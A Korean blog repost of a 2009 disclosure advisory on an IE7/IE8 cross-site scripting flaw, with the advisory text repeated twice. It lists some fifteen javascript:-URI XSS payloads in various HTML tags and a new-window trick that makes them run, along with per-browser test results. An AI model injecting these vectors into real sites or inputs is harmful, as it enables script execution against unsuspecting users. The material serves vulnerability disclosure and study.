반응형
실제 악의적으로 사용한 흔적은 아직까지는 없는듯 하다.
조만간에 나오겠군 ㅡ.ㅡ;
- Exploit Code
Multiple Exploiting IE8/IE7 XSS Vulnerability
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References:
http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerabili
ty.txt
Overview:
Tags[not include <IFRAME>] in ie7/8 are don't allowe to run
"javascript:[jscodz]",but
we found them allowed ro run where open it in new target.
like this url:
http://www.80vul.com/test/ie8-1.htm
ie8-1.htm's codz :
<STYLE>@import
'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet"
HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image:
url(javascript:alert('XSS7'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS8')"
);}</STYLE><A
CLASS=XSS></A>
<STYLE
type="text/css">BODY{background:url("javascript:alert('XS
S9')")}</STYLE>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert('XSS10')></OBJECT>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<script SRC="javascript:alert('xss11');"></script>
<video SRC="javascript:alert('xss12');"</video>
<LAYER SRC="javascript:alert('xss13')"></LAYER>
<embed src="javascript:alert('xss14')"
type="application/x-shockwave-flash"
allowscriptaccess="always"
width="0" height="0"></embed>
<applet src="javascript:alert('xss15')" type=text/html>
when visite this url by ie7/8, <IFRAME
SRC="javascript:alert('XSS6');"></IFRAME> this is
runing, but other
aren't to run.
but, where open ie8-1.htm in new target[like this :<a href=
target="_blank"> and <iframe> and window.open in
<sript> ... etc.] ,so
test this codz in my localhost:
<a href="http://www.80vul.com/test/ie8-1.htm"
target="_blank">go</a>
[PS: go don't work]
of couse this codz:
<iframe
src="http://www.80vul.com/test/ie8s.htm"></iframe>
and this codz:
<script>window.open("http://www.80vul.com/test/ie8-1.htm");
</script>
........[testing].......
So the results is :
---------------------------------------------------------
IE | alert
---------------------------------------------------------
ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
------------------------------------------------------
ie8: xss4/xss1/xss11/xss6
---------------------------------------------------------
Disclosure Timeline:
2009/05/01 - Found this Vulnerability
2009/06/22 - Public Disclosure
Greeting:
ycosxhack
Multiple Exploiting IE8/IE7 XSS Vulnerability
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References:
http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerabili
ty.txt
Overview:
Tags[not include <IFRAME>] in ie7/8 are don't allowe to run
"javascript:[jscodz]",but
we found them allowed ro run where open it in new target.
like this url:
http://www.80vul.com/test/ie8-1.htm
ie8-1.htm's codz :
<STYLE>@import
'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet"
HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image:
url(javascript:alert('XSS7'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS8')"
);}</STYLE><A
CLASS=XSS></A>
<STYLE
type="text/css">BODY{background:url("javascript:alert('XS
S9')")}</STYLE>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert('XSS10')></OBJECT>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<script SRC="javascript:alert('xss11');"></script>
<video SRC="javascript:alert('xss12');"</video>
<LAYER SRC="javascript:alert('xss13')"></LAYER>
<embed src="javascript:alert('xss14')"
type="application/x-shockwave-flash"
allowscriptaccess="always"
width="0" height="0"></embed>
<applet src="javascript:alert('xss15')" type=text/html>
when visite this url by ie7/8, <IFRAME
SRC="javascript:alert('XSS6');"></IFRAME> this is
runing, but other
aren't to run.
but, where open ie8-1.htm in new target[like this :<a href=
target="_blank"> and <iframe> and window.open in
<sript> ... etc.] ,so
test this codz in my localhost:
<a href="http://www.80vul.com/test/ie8-1.htm"
target="_blank">go</a>
[PS: go don't work]
of couse this codz:
<iframe
src="http://www.80vul.com/test/ie8s.htm"></iframe>
and this codz:
<script>window.open("http://www.80vul.com/test/ie8-1.htm");
</script>
........[testing].......
So the results is :
---------------------------------------------------------
IE | alert
---------------------------------------------------------
ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
------------------------------------------------------
ie8: xss4/xss1/xss11/xss6
---------------------------------------------------------
Disclosure Timeline:
2009/05/01 - Found this Vulnerability
2009/06/22 - Public Disclosure
Greeting:
ycosxhack
- 관련내용
http://securityreason.com/wlb_show/WLB-2009060054
http://seclists.org/fulldisclosure/2009/Jun/0215.html
댓글